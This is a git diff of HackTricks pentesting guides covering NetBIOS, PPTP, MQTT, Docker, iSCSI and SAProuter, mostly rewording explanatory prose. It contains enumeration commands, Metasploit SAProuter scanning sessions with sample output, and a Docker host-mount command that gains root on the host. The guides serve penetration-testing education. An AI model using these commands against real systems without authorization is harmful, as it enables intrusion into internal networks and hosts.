@@ -16,15 +16,17 @@ Other ways to support HackTricks: ## NetBios Name Service +**NetBIOS Name Service** plays a crucial role, involving various services such as **name registration and resolution**, **datagram distribution**, and **session services**, utilizing specific ports for each service. + +[From Wikidepia](https://en.wikipedia.org/wiki/NetBIOS_over_TCP/IP): + * Name service for name registration and resolution (ports: 137/udp and 137/tcp). * Datagram distribution service for connectionless communication (port: 138/udp). * Session service for connection-oriented communication (port: 139/tcp). ### Name Service -Every machine should have a name inside the NetBios network. To request a name, a machine should send a "Name Query" packet in broadcast and if anyone answer that it is already using that name, the machine can use that name. If there is a Name Service server, the computer could ask the Name Service server if someone is using the name that it wants to use. - -To discover the IP address of a Name, a PC has to send a "Name Query" packet and wait if anyone answers. If there is a Name Service server, the PC can ask it for the IP of the name. +For a device to participate in a NetBIOS network, it must have a unique name. This is achieved through a **broadcast process** where a "Name Query" packet is sent. If no objections are received, the name is considered available. Alternatively, a **Name Service server** can be queried directly to check for name availability or to resolve a name to an IP address. Tools like `nmblookup`, `nbtscan`, and `nmap` are utilized for enumerating NetBIOS services, revealing server names and MAC addresses. ```bash PORT STATE SERVICE VERSION 
@@ -41,7 +43,7 @@ sudo nmap -sU -sV -T4 --script nbstat.nse -p137 -Pn -n ### Datagram Distribution Service -NetBIOS datagrams are sent over UDP. A datagram is sent with a "Direct Unique" or "Direct Group" packet if it's being sent to a particular NetBIOS name, or a "Broadcast" packet if it's being sent to all NetBIOS names on the network. +NetBIOS datagrams allow for connectionless communication via UDP, supporting direct messaging or broadcasting to all network names. This service uses port **138/udp**. ```bash PORT STATE SERVICE VERSION 
@@ -50,15 +52,11 @@ PORT STATE SERVICE VERSION ### Session Service -Session mode lets two computers establish a connection for a "conversation", allows larger messages to be handled, and provides error detection and recovery. +For connection-oriented interactions, the **Session Service** facilitates a conversation between two devices, leveraging **TCP** connections through port **139/tcp**. A session begins with a "Session Request" packet and can be established based on the response. The service supports larger messages, error detection, and recovery, with TCP handling flow control and packet retransmission. -Sessions are established by exchanging packets. The computer establishing the session attempts to make a [TCP](https://en.wikipedia.org/wiki/Transmission\_Control\_Protocol) connection to port 139 on the computer with which the session is to be established. If the connection is made, the computer establishing the session then sends over the connection a "Session Request" packet with the NetBIOS names of the application establishing the session and the NetBIOS name to which the session is to be established. The computer with which the session is to be established will respond with a "Positive Session Response" indicating that a session can be established or a "Negative Session Response" indicating that no session can be established (either because that computer isn't listening for sessions being established to that name or because no resources are available to establish a session to that name). +Data transmission within a session involves **Session Message packets**, with sessions being terminated by closing the TCP connection. -Data is transmitted during an established session by Session Message packets. 
- -TCP handles flow control and retransmission of all session service packets, and the dividing of the data stream over which the packets are transmitted into [IP](https://en.wikipedia.org/wiki/Internet\_Protocol) datagrams small enough to fit in link-layer packets. - -Sessions are closed by closing the TCP connection. +These services are integral to **NetBIOS** functionality, enabling efficient communication and resource sharing across a network. For more information on TCP and IP protocols, refer to their respective [TCP Wikipedia](https://en.wikipedia.org/wiki/Transmission_Control_Protocol) and [IP Wikipedia](https://en.wikipedia.org/wiki/Internet_Protocol) pages. ```bash PORT STATE SERVICE VERSION @@ -86,7 +84,7 @@ Entry_1: Datagram distribution service for connectionless communication (port: 138/udp). Session service for connection-oriented communication (port: 139/tcp). - Every machine should have a name inside the NetBios network. To request a name, a machine should send a "Name Query" packet in broadcast and if anyone answer that it is already using that name, the machine can use that name. If there is a Name Service server, the computer could ask the Name Service server if someone is using the name that it wants to use. + For a device to participate in a NetBIOS network, it must have a unique name. This is achieved through a broadcast process where a "Name Query" packet is sent. If no objections are received, the name is considered available. Alternatively, a Name Service server can be queried directly to check for name availability or to resolve a name to an IP address. https://book.hacktricks.xyz/pentesting/137-138-139-pentesting-netbios diff --git a/network-services-pentesting/1723-pentesting-pptp.md b/network-services-pentesting/1723-pentesting-pptp.md index 30c91c303..b38b09666 100644 --- a/network-services-pentesting/1723-pentesting-pptp.md +++ b/network-services-pentesting/1723-pentesting-pptp.md 
@@ -16,7 +16,7 @@ Other ways to support HackTricks: ## Basic Information -Commonly used to provide remote access to mobile devices, Point-to-Point Tunneling Protocol (PPTP) uses TCP port 1723 for key exchange and IP protocol 47 (GRE) to encrypt data between peers. +**Point-to-Point Tunneling Protocol (PPTP)** is a method widely employed for **remote access** to mobile devices. It utilizes **TCP port 1723** for the exchange of keys, while **IP protocol 47** (Generic Routing Encapsulation, or **GRE**), is used to encrypt the data that is transmitted between peers. This setup is crucial for establishing a secure communication channel over the internet, ensuring that the data exchanged remains confidential and protected from unauthorized access. **Default Port**:1723 @@ -29,10 +29,8 @@ nmap –Pn -sSV -p1723 ### [Brute Force](../generic-methodologies-and-resources/brute-force.md#pptp) ## Vulnerabilities - -{% embed url="https://www.schneier.com/academic/pptp/" %} - -{% embed url="https://github.com/moxie0/chapcrack" %} +* [https://www.schneier.com/academic/pptp/](https://www.schneier.com/academic/pptp/) +* [https://github.com/moxie0/chapcrack](https://github.com/moxie0/chapcrack)
diff --git a/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md b/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md index ef21f3b3a..f651c75f4 100644 --- a/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md +++ b/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md @@ -16,7 +16,7 @@ Other ways to support HackTricks: ## Basic Information -MQTT stands for MQ Telemetry Transport. It is a publish/subscribe, **extremely simple and lightweight messaging protocol**, designed for constrained devices and low-bandwidth, high-latency or unreliable networks. The design principles are to minimise network bandwidth and device resource requirements whilst also attempting to ensure reliability and some degree of assurance of delivery. These principles also turn out to make the protocol ideal of the emerging “machine-to-machine” (M2M) or “Internet of Things” world of connected devices, and for mobile applications where bandwidth and battery power are at a premium. +**MQ Telemetry Transport (MQTT)** is known as a **publish/subscribe messaging protocol** that stands out for its extreme simplicity and lightness. This protocol is specifically tailored for environments where devices have limited capabilities and operate over networks that are characterized by low bandwidth, high latency, or unreliable connections. The core objectives of MQTT include minimizing the usage of network bandwidth and reducing the demand on device resources. Additionally, it aims to maintain reliable communication and provide a certain level of delivery assurance. These goals make MQTT exceptionally suitable for the burgeoning field of **machine-to-machine (M2M) communication** and the **Internet of Things (IoT)**, where it's essential to connect a myriad of devices efficiently. Moreover, MQTT is highly beneficial for mobile applications, where conserving bandwidth and battery life is crucial. **Default port:** 1883 
@@ -27,7 +27,16 @@ PORT STATE SERVICE REASON ## Inspecting the traffic -MQTT brokers send a **CONNACK** packet in **response** to a CONNECT packet. The **return code 0x00** indicates the credentials are valid and the return code **0x05 indicates they aren't. 0x05 example:** +hen a **CONNECT** packet is received by MQTT brokers, a **CONNACK** packet is sent back. This packet contains a return code which is crucial for understanding the connection status. A return code of **0x00** means that the credentials have been accepted, signifying a successful connection. On the other hand, a return code of **0x05** signals that the credentials are invalid, thus preventing the connection. + +For instance, if the broker rejects the connection due to invalid credentials, the scenario would look something like this: + +``` +{ + "returnCode": "0x05", + "description": "Connection Refused, not authorized" +} +``` ![](<../.gitbook/assets/image (645) (1).png>) 
@@ -98,17 +107,30 @@ The publish/subscribe model is composed of: * **Broker**: routes all the messages from the publishers to the subscribers. * **Topic**: consists of one or more levels that are separated by a a forward slash (e.g., /smartshouse/livingroom/temperature). -![](https://miro.medium.com/max/1073/1\*sIxvchdgHSqAGebJjFHBAg.png) - ### Packet Format Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header -![](https://miro.medium.com/max/838/1\*k6RkAHEk0576geQGUcKSTA.png) +![https://miro.medium.com/max/838/1\*k6RkAHEk0576geQGUcKSTA.png](https://miro.medium.com/max/838/1\*k6RkAHEk0576geQGUcKSTA.png) -The first field of the fixed header represents the type of the MQTT Packet. All packet types are listed in table 01.Table 01: MQTT Packet Types +### Packet Types + +* CONNECT (1): Initiated by the client to request a connection to the server. +* CONNACK (2): The server's acknowledgment of a successful connection. +* PUBLISH (3): Used to send a message from the client to the server or vice versa. +* PUBACK (4): Acknowledgment of a PUBLISH packet. +* PUBREC (5): Part of a message delivery protocol ensuring the message is received. +* PUBREL (6): Further assurance in message delivery, indicating a message release. +* PUBCOMP (7): Final part of the message delivery protocol, indicating completion. +* SUBSCRIBE (8): A client's request to listen for messages from a topic. +* SUBACK (9): The server's acknowledgment of a SUBSCRIBE request. +* UNSUBSCRIBE (10): A client's request to stop receiving messages from a topic. +* UNSUBACK (11): The server's response to an UNSUBSCRIBE request. +* PINGREQ (12): A heartbeat message sent by the client. +* PINGRESP (13): Server's response to the heartbeat message. +* DISCONNECT (14): Initiated by the client to terminate the connection. +* Two values, 0 and 15, are marked as reserved and their use is forbidden. -![](https://miro.medium.com/max/1469/1\*z0fhdUVzGa0PLikH\_cyBmQ.png) ## Shodan 
diff --git a/network-services-pentesting/2375-pentesting-docker.md b/network-services-pentesting/2375-pentesting-docker.md index 1d803909c..18e72664d 100644 --- a/network-services-pentesting/2375-pentesting-docker.md +++ b/network-services-pentesting/2375-pentesting-docker.md @@ -1,4 +1,3 @@ -# 2375, 2376 Pentesting Docker
@@ -18,15 +17,15 @@ Other ways to support HackTricks: ### What is -The Docker Platform is the industry-leading container platform for continuous, high-velocity innovation, enabling organizations to seamlessly build and share any application — from legacy to what comes next — and securely run them anywhere. +Docker is the **forefront platform** in the **containerization industry**, spearheading **continuous innovation**. It facilitates the effortless creation and distribution of applications, spanning from **traditional to futuristic**, and assures their **secure deployment** across diverse environments. ### Basic docker architecture -* **[containerd](http://containerd.io)** is a runtime for containers that is capable of **managing the entire lifecycle of a container, including the transfer and storage of images, as well as the execution, supervision, and networking of the container**. **Further details about containerd are provided below**. -* The handling of headless containers is facilitated by container-shim, which serves as an intermediary. Specifically, after the initialization of the containers by runc, control is passed to the container-shim. -* **[runc](http://runc.io)** is recognized as a lightweight, universal container runtime that complies with the OCI specification. It is utilized by containerd to initiate and manage containers in accordance with the OCI specifications and represents a rebranded version of libcontainer. -* For the purpose of facilitating communication between containerd and the docker-engine, **[grpc](http://www.grpc.io)** is employed. -* The OCI specification for runtime and images is maintained by **[OCI](https://www.opencontainers.org)**, with current docker versions being compliant with both the OCI image and runtime specifications. +- **[containerd](http://containerd.io)**: This is a **core runtime** for containers, tasked with the comprehensive **management of a container's lifecycle**. 
This involves handling **image transfer and storage**, in addition to overseeing the **execution, monitoring, and networking** of containers. **More detailed insights** on containerd are **further explored**. +- The **container-shim** plays a critical role as an **intermediary** in the handling of **headless containers**, seamlessly taking over from **runc** after the containers are initialized. +- **[runc](http://runc.io)**: Esteemed for its **lightweight and universal container runtime** capabilities, runc is aligned with the **OCI standard**. It is used by containerd to **start and manage containers** according to the **OCI guidelines**, having evolved from the original **libcontainer**. +- **[grpc](http://www.grpc.io)** is essential for **facilitating communication** between containerd and the **docker-engine**, ensuring **efficient interaction**. +- The **[OCI](https://www.opencontainers.org)** is pivotal in maintaining the **OCI specifications** for runtime and images, with the latest Docker versions being **compliant with both the OCI image and runtime** standards. ### Basic commands 
@@ -55,9 +54,12 @@ docker system prune -a ### Containerd -Containerd was designed to be used by Docker and Kubernetes as well as any other container platform that wants to **abstract away syscalls or OS specific functionality to run container**s on linux, windows, solaris, or other OSes. With these users in mind, we wanted to make sure that containerd has only what they need and nothing that they don’t. Realistically this is impossible but at least that is what we try for. Things like **networking are out of scope for containerd**. The reason for this is, when you are building a distributed system, networking is a very central aspect. With SDN and service discovery today, networking is way more platform specific than abstracting away netlink calls on linux. +**Containerd** was specifically developed to serve the needs of container platforms like **Docker and Kubernetes**, among others. It aims to **simplify the execution of containers** across various operating systems, including Linux, Windows, Solaris, and more, by abstracting operating system-specific functionality and system calls. The goal of Containerd is to include only the essential features required by its users, striving to omit unnecessary components. However, achieving this goal completely is acknowledged as challenging. + +A key design decision is that **Containerd does not handle networking**. Networking is considered a critical element in distributed systems, with complexities such as Software Defined Networking (SDN) and service discovery that vary significantly from one platform to another. Therefore, Containerd leaves networking aspects to be managed by the platforms it supports. + +While **Docker utilizes Containerd** to run containers, it's important to note that Containerd only supports a subset of Docker's functionalities. Specifically, Containerd lacks the network management capabilities present in Docker and does not support the creation of Docker swarms directly. 
This distinction highlights Containerd's focused role as a container runtime environment, delegating more specialized functionalities to the platforms it integrates with. -Note then that **Docker uses Containerd, but it only provides a subet of the features that Docker provides**. So for example ContainerD doesn't have Docker's network management features, nor can you use ContainerD alone to create Docker swarms. ```bash #Containerd CLI 
@@ -77,18 +79,19 @@ ctr container delete ### Podman -An open-source, OCI ([Open Container Initiative](https://github.com/opencontainers)) compliant container engine known as Podman is maintained by Red Hat. It is characterized by several key distinctions from Docker, including its daemonless structure and the support for containers that do not require root access. The primary function of both tools is to manage images and containers. A notable goal of Podman is compatibility with Docker's API, allowing for the use of almost all Docker CLI commands within Podman. +**Podman** is an open-source container engine that adheres to the [Open Container Initiative (OCI) standards](https://github.com/opencontainers), developed and maintained by Red Hat. It stands out from Docker with several distinct features, notably its **daemonless architecture** and support for **rootless containers**, enabling users to run containers without root privileges. -Within the Podman ecosystem, two additional tools, Buildah and Skopeo, are present. Buildah serves as a CLI tool for building container images, while Skopeo is utilized for operations on images like push, pull, or inspect. For further information on these tools and their integration with Podman, [refer to their GitHub page](https://github.com/containers/buildah/tree/master/docs/containertools). +Podman is designed to be compatible with Docker's API, allowing for the use of Docker CLI commands. This compatibility extends to its ecosystem, which includes tools like **Buildah** for building container images and **Skopeo** for image operations such as push, pull, and inspect. More details on these tools can be found on their [GitHub page](https://github.com/containers/buildah/tree/master/docs/containertools). **Key Differences** -The most significant distinction between Docker and Podman lies in their architectural design. 
Docker operates on a client-server model, necessitating the use of the Docker CLI to interact with a background daemon responsible for image building and container execution, which operates with root privileges. In contrast, Podman employs a daemonless architecture, allowing containers to be executed under the initiating user's privileges without requiring root access. This design ensures that users of Podman can only interact with their own containers, without a shared daemon for CLI communication. +- **Architecture**: Unlike Docker’s client-server model with a background daemon, Podman operates without a daemon. This design means containers run with the privileges of the user who starts them, enhancing security by eliminating the need for root access. + +- **Systemd Integration**: Podman integrates with **systemd** to manage containers, allowing for container management through systemd units. This contrasts with Docker's use of systemd primarily for managing the Docker daemon process. -To accommodate background container operation without a daemon, Podman integrates with **systemd**, enabling container management through systemd units. This integration varies with the Podman version, offering the ability to generate units for both existing and yet-to-be-created containers, as well as facilitating systemd's operation within containers. Unlike Podman, Docker traditionally relies on systemd for daemon process management. - -Another critical difference is in the execution of containers. Podman allows containers to run with the privileges of the initiating user, not under a daemon. This introduces the concept of rootless containers, which can be initiated without root access, offering a significant security advantage by limiting the potential impact of container breaches. 
Rootless containers ensure that a compromised container's attacker possesses only the privileges of a normal user on the host, preventing the escalation of privileges beyond those of the initiating user and thereby enhancing security. +- **Rootless Containers**: A pivotal feature of Podman is its ability to run containers under the initiating user's privileges. This approach minimizes the risks associated with container breaches by ensuring that attackers gain only the compromised user's privileges, not root access. +Podman's approach offers a secure and flexible alternative to Docker, emphasizing user privilege management and compatibility with existing Docker workflows. {% hint style="info" %} Note that as podam aims to support the same API as docker, you can use the same commands with podman as with docker such as: @@ -168,7 +171,7 @@ docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash #### Curl -Sometimes you’ll see **2376** up for the **TLS** endpoint. I haven’t been able to connect to it with the docker client but you can with curl no problem to hit the docker API. +Sometimes you’ll see **2376** up for the **TLS** endpoint. I haven’t been able to connect to it with the docker client but it's possible to do it with curl. ```bash #List containers 
@@ -297,7 +300,7 @@ docker cp :/etc/ * You can use the tool [https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco) to detect **suspicious behaviour in running containers**. * Note in the following chunk how **Falco compiles a kernel module and insert it**. After that, it loads the rules and **start logging suspicious activities**. In this case it has detected 2 privileged containers started, 1 of them with a sensitive mount, and after some seconds it detected how a shell was opened inside one of the containers. -``` +```bash docker run -it --privileged -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro falco * Setting up /usr/src links from host * Unloading falco-probe, if present @@ -342,7 +345,7 @@ falco-probe found and loaded in dkms You can use auditd to monitor docker. -# References +## References * [https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html](https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html) * [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc) diff --git a/network-services-pentesting/3260-pentesting-iscsi.md b/network-services-pentesting/3260-pentesting-iscsi.md index 5611b32e6..c443d9640 100644 --- a/network-services-pentesting/3260-pentesting-iscsi.md +++ b/network-services-pentesting/3260-pentesting-iscsi.md 
@@ -16,6 +16,8 @@ Other ways to support HackTricks: ## Basic Information +From [Wikipedia](https://en.wikipedia.org/wiki/ISCSI): + > In computing, **iSCSI** is an acronym for **Internet Small Computer Systems Interface**, an Internet Protocol (IP)-based storage networking standard for linking data storage facilities. It provides block-level access to storage devices by carrying SCSI commands over a TCP/IP network. iSCSI is used to facilitate data transfers over intranets and to manage storage over long distances. It can be used to transmit data over local area networks (LANs), wide area networks (WANs), or the Internet and can enable location-independent data storage and retrieval. > > The protocol allows clients (called initiators) to send SCSI commands (CDBs) to storage devices (targets) on remote servers. It is a storage area network (SAN) protocol, allowing organizations to consolidate storage into storage arrays while providing clients (such as database and web servers) with the illusion of locally attached SCSI disks. It mainly competes with Fibre Channel, but unlike traditional Fibre Channel which usually requires dedicated cabling, iSCSI can be run over long distances using existing network infrastructure. @@ -70,9 +72,11 @@ You may now mount the target as per the instructions in the link. sudo apt-get install open-iscsi ``` +Example from [iscsiadm docs](https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm): + First of all you need to **discover the targets** name behind the IP: -``` +```bash iscsiadm -m discovery -t sendtargets -p 123.123.123.123:3260 123.123.123.123:3260,1 iqn.1992-05.com.emc:fl1001433000190000-3-vnxe [2a01:211:7b7:1223:211:32ff:fea9:fab9]:3260,1 iqn.2000-01.com.synology:asd3.Target-1.d0280fd382 
@@ -183,7 +187,8 @@ node.conn[0].iscsi.OFMarker = No ## **References** -{% embed url="https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html" %} +* [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html) +* [https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm](https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm)
diff --git a/network-services-pentesting/3299-pentesting-saprouter.md b/network-services-pentesting/3299-pentesting-saprouter.md index e3888fb40..d63aebf58 100644 --- a/network-services-pentesting/3299-pentesting-saprouter.md +++ b/network-services-pentesting/3299-pentesting-saprouter.md @@ -14,330 +14,82 @@ Other ways to support HackTricks:
- -Copy of: [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/) - ```text PORT STATE SERVICE VERSION 3299/tcp open saprouter? ``` -# Piercing SAProuter with Metasploit +This is a summary of the post from [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/) -Saprouter is basically a reverse proxy for SAP systems, typically sitting between the Internet and internal SAP systems. Its main purpose is to allow controlled access from hosts on the Internet to the internal SAP systems, since it allows for a finer grained control of SAP protocols than a typical firewall. -This means that saprouter usualy ends up being exposed to the Internet, by allowing the inbound TCP port 3299 to the saprouter host on the organization's firewalls. And from the saprouter, at least it should be possible to reach an internal SAP server. This makes it a very interesting target, since it can provide a way into the “high value” network. +## Understanding SAProuter Penetration with Metasploit -The following figure shows a basic network setup, which we will use for the examples: +SAProuter acts as a reverse proxy for SAP systems, primarily to control access between the internet and internal SAP networks. It's commonly exposed to the internet by allowing TCP port 3299 through organizational firewalls. This setup makes SAProuter an attractive target for penetration testing because it might serve as a gateway to high-value internal networks. -![](https://blog.rapid7.com/content/images/post-images/33923/image1.jpg) +**Scanning and Information Gathering** -First we'll start by performing a SAP service scan of the exposed IP address, using the [`sap_service_discovery`](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_service_discovery) module, in this case, 1.2.3.101. 
+Initially, a scan is performed to identify if a SAP router is running on a given IP using the **sap_service_discovery** module. This step is crucial for establishing the presence of a SAP router and its open port. ```text msf> use auxiliary/scanner/sap/sap_service_discovery msf auxiliary(sap_service_discovery) > set RHOSTS 1.2.3.101 -RHOSTS => 1.2.3.101 msf auxiliary(sap_service_discovery) > run - -[*] [SAP] Beginning service Discovery '1.2.3.101' - -[+] 1.2.3.101:3299 - SAP Router OPEN -[*] Scanned 1 of 1 hosts (100% complete) -[*] Auxiliary module execution completed ``` -The scan shows us that the host is running a SAP router on the expected port TCP 3299. We can now dig deeper, and attempt to obtain some information from the saprouter. If it has been misconfigured, and often they are, it may be possible to obtain internal information, such as connections established through the saprouter to internal hosts. For this purpose we use the [`sap_router_info_request`](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_router_info_request) module: +Following the discovery, further investigation into the SAP router's configuration is carried out with the **sap_router_info_request** module to potentially reveal internal network details. 
```text msf auxiliary(sap_router_info_request) > use auxiliary/scanner/sap/sap_router_info_request msf auxiliary(sap_router_info_request) > set RHOSTS 1.2.3.101 -RHOSTS => 1.2.3.101 msf auxiliary(sap_router_info_request) > run - -[+] 1.2.3.101:3299 - Connected to saprouter -[+] 1.2.3.101:3299 - Sending ROUTER_ADM packet info request -[+] 1.2.3.101:3299 - Got INFO response -[+] Working directory : /opt/sap -[+] Routtab : ./saprouttab - -[SAP] SAProuter Connection Table for 1.2.3.101 -=================================================== - - Source Destination Service - ------ ----------- ------- - 1.2.3.12 192.168.1.18 3200 - - -[*] Scanned 1 of 1 hosts (100% complete) -[*] Auxiliary module execution completed ``` -So, from the output we see that someone on the Internet \(1.2.3.12\) is connected to an internal host \(192.168.1.18\) on port 3200. Port 3200 is a common SAP port for the DIAG protocol \(that's where the SAP GUI application connects to SAP servers\). We also obtain information about the internal IP addressing scheme, they're quite surely using at least the 192.168.1.0/24 network, or some subnet in that network. +**Enumerating Internal Services** -**Enumerating internal hosts and services** - -With this information, we are now able to start scanning the internal network. Since saprouter works like a proxy, we will attempt to connect to it and request connections to internal hosts and ports, and see the replies from saprouter. This may gives more insight into the internal hosts, services and ACLs, depending on the configuration of the saprouter. We'll be using the [`sap_router_portscanner`](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_router_portscanner) module for this purpose. - -The module connects to the saprouter and requests connections to other hosts \(defined in the TARGETS option\) in specific TCP ports. It then analyses the replies, and understands whether the requested connection is possible or not. 
This module provides a few options that can used: - -```text -Basic options: - Name Current Setting Required Description - ---- --------------- -------- ----------- - CONCURRENCY 10 yes The number of concurrent ports to check per host - INSTANCES 00-99 no SAP instance numbers to scan (NN in PORTS definition) - MODE SAP_PROTO yes Connection Mode: SAP_PROTO or TCP (accepted: SAP_PROTO, TCP) - PORTS 32NN yes Ports to scan (e.g. 3200-3299,5NN13) - RESOLVE local yes Where to resolve TARGETS (accepted: remote, local) - RHOST yes SAPRouter address - RPORT 3299 yes SAPRouter TCP port - TARGETS yes Comma delimited targets. When resolution is local address ranges or CIDR identifiers allowed. -``` - -At the very least you'll have to set the saprouter's IP address, in the example case, 1.2.3.101. Then, set TARGETS to the internal network addresses you'd like to scan, and finally set PORTS with the TCP ports to scan. - -The module provides also an INSTANCES option that allows simplifying the definition of the PORTS option. SAP installations support multiple instances, providing similar services, so each instance has assigned TCP ports. For example, SAP instance 00 will have the SAP dispatcher service \(where SAP GUI connects to\) on port 3200 and instance 01 on port 3201. The PORTS option supports a “wildcard” which is “NN” that will be replaced with the instance number, hence scanning ports for all the defined instances. So, if we want to scan instances from 00 to 50, we can define the INSTANCES and PORTS variables this way: +With obtained internal network insights, the **sap_router_portscanner** module is used to probe internal hosts and services through the SAProuter, allowing a deeper understanding of internal networks and service configurations. ```text msf auxiliary(sap_router_portscanner) > set INSTANCES 00-50 -INSTANCES => 00-01 msf auxiliary(sap_router_portscanner) > set PORTS 32NN -PORTS => 32NN ``` -With this setting the module will scan ports in range 3200 to 3250. 
+This module's flexibility in targeting specific SAP instances and ports makes it an effective tool for detailed internal network exploration. -In the source of the module you have information regarding the common default ports on SAP systems, which we will now be using for scanning: +**Advanced Enumeration and ACL Mapping** -```text -msf > use auxiliary/scanner/sap/sap_router_portscanner -msf auxiliary(sap_router_portscanner) > use auxiliary/scanner/sap/sap_router_portscanner -msf auxiliary(sap_router_portscanner) > set RHOST 1.2.3.101 -RHOST => 1.2.3.101 -msf auxiliary(sap_router_portscanner) > set TARGETS 192.168.1.18 -TARGETS => 192.168.1.18 -msf auxiliary(sap_router_portscanner) > set INSTANCES 00-01 -INSTANCES => 00-01 -msf auxiliary(sap_router_portscanner) > set PORTS 32NN,33NN,48NN,80NN,36NN,81NN,5NN00-5NN19,21212,21213,59975,59976,4238-4241,3299,3298,515,7200,7210,7269,7270,7575,39NN,3909,4NN00,8200,8210,8220,8230,4363,4444,4445,9999,3NN01-3NN08,3NN11,3NN17,20003-20007,31596,31597,31602,31601,31604,2000-2002,8355,8357,8351-8353,8366,1090,1095,20201,1099,1089,443NN,444NN -PORTS => 32NN,33NN,48NN,80NN,36NN,81NN,5NN00-5NN19,21212,21213,59975,59976,4238-4241,3299,3298,515,7200,7210,7269,7270,7575,39NN,3909,4NN00,8200,8210,8220,8230,4363,4444,4445,9999,3NN01-3NN08,3NN11,3NN17,20003-20007,31596,31597,31602,31601,31604,2000-2002,8355,8357,8351-8353,8366,1090,1095,20201,1099,1089,443NN,444NN -msf auxiliary(sap_router_portscanner) > run - -[*] Scanning 192.168.1.18 -[!] Warning: Service info could be inaccurate - -Portscan Results -================ - - Host Port State Info - ---- ---- ----- ---- - 192.168.1.18 3201 closed SAP Dispatcher sapdp01 - 192.168.1.18 3200 open SAP Dispatcher sapdp00 - 192.168.1.18 50013 open SAP StartService [SOAP] sapctrl00 - -[*] Auxiliary module execution completed -``` - -We can try to understand why some connections are not allowed through the saprouter by using the VERBOSE option. 
When VERBOSE is set to true we are able to see the response from the saprouter, and map the defined ACL. - -We will now scan the 192.168.1.18 and the 192.168.1.1 hosts, but only on port 3200, to see if we can connect to both SAP dispatchers: - -```text -msf auxiliary(sap_router_portscanner) > set VERBOSE true -VERBOSE => true -msf auxiliary(sap_router_portscanner) > set TARGETS 192.168.1.1,192.168.1.18 -TARGETS => 192.168.1.1,192.168.1.18 -msf auxiliary(sap_router_portscanner) > set PORTS 32NN -PORTS => 32NN -msf auxiliary(sap_router_portscanner) > run - -[*] Scanning 192.168.1.18 -[+] 192.168.1.18:3200 - TCP OPEN -[!] Warning: Service info could be inaccurate - -Portscan Results -================ - - Host Port State Info - ---- ---- ----- ---- - 192.168.1.18 3200 open SAP Dispatcher sapdp00 - -[*] Scanning 192.168.1.1 -[-] 192.168.1.1:3200 - blocked by ACL -[!] Warning: Service info could be inaccurate -[*] Auxiliary module execution completed -``` - -As you can see, we now also know that we cannot connect to other host on port 3200, since it is blocked by the ACL defined on the saprouter. - -**Mapping the ACLs** - -An interesting thing about the saprouter, is that it supports two types of connections: - -* Native – These connections are simply TCP connections; -* SAP protocol – These are TCP connections with a twist, the protocol states that all messages are started with 4 bytes stating the length of the following content. - -The SAP protocol is specific to saprouter, and is what the SAP GUI uses to connect to the SAP DIAG port through the saprouter. The native protocol is used for allowing other types of connections to pass through saprouter. - -This module allows for specifying which type of connection to test during the scan in the MODE option. The default is the SAP protocol, which is the most probable to be used in production. 
However, it is not uncommon to find other services allowed through the saprouter, where the ACL will allow native \(TCP\) connections through. - -We can set the MODE to TCP in order to assess whether this type of connections are allowed. We will now scan the internal hosts, both on port 3200 \(SAP DIAG\) and 80 \(HTTP\), with VERBOSE set to true, on both instances 00 and 01 and see what happens: +Further scanning can reveal how Access Control Lists (ACLs) are configured on the SAProuter, detailing which connections are allowed or blocked. This information is pivotal in understanding security policies and potential vulnerabilities. ```text msf auxiliary(sap_router_portscanner) > set MODE TCP -MODE => TCP - msf auxiliary(sap_router_portscanner) > set PORTS 80,32NN -PORTS => 80,32NN -msf auxiliary(sap_router_portscanner) > set INSTANCES 00-01 -INSTANCES => 00-01 -msf auxiliary(sap_router_portscanner) > run - -[*] Scanning 192.168.1.18 -[+] 192.168.1.18:80 - TCP OPEN -[-] 192.168.1.18:3200 - blocked by ACL -[+] 192.168.1.18:3201 - TCP OPEN -[!] Warning: Service info could be inaccurate - -Portscan Results -================ - - Host Port State Info - ---- ---- ----- ---- - 192.168.1.18 80 open - 192.168.1.18 3201 open SAP Dispatcher sapdp01 - -[*] Scanning 192.168.1.1 -[-] 192.168.1.1:3200 - blocked by ACL -[+] 192.168.1.1:3201 - TCP OPEN -[+] 192.168.1.1:80 - TCP OPEN -[!] 
